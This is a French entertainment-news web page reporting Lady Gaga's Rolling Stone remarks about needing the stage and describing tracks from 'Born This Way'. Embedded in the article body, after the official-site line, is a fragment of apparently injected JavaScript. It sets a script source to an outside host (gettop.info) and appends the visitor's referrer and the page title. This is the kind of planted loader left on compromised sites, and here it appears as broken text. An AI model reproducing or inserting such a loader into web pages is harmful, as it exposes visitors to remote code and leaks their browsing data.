Lady Gaga la scène c’est toute sa vie


Facebooktwitterredditpinterestlinkedinmail

De retour avec « Born This Way », Lady Gaga a donné une interview au magazine américain Rolling Stone dans lequel elle se confie sur son besoin vital de donner des concerts. « Quand je ne suis pas sur scène, je n’existe plus. Que ce soit bon pour moi ou pas, peu importe l’avis des médecins ou de qui que ce soit, je m’en moque. Je ne me sens pas en vie tant que je ne suis pas sur scène et c’est ainsi que je suis née », a-t-elle indiqué.

Avant de revoir Lady Gaga sur scène , le public québecois peut patienter en écoutant les titres de « Born This Way ». Outre les morceaux « Judas », « The Edge of Glory » et « Hair » dévoilés ces dernières semaines, le titre « Americano » et ses rythmes hispanisants rappellent le tube « Alejandro », quant à « Highway Unicorn », il a de faux airs de « Bad Romance ». Le sulfureux « Scheiße », le très aérien « Bloody Mary » ou encore « Electric Chapel » avec ses accents rock marquent par ailleurs une certaine prise de risque pour la jeune femme.

Site Officiel Lady Gaga
s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Previous Beatles et les Rolling Stones c'est la guéguerre!
Next Justin Bieber une drogue à son nom!

No Comment

Leave a reply

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *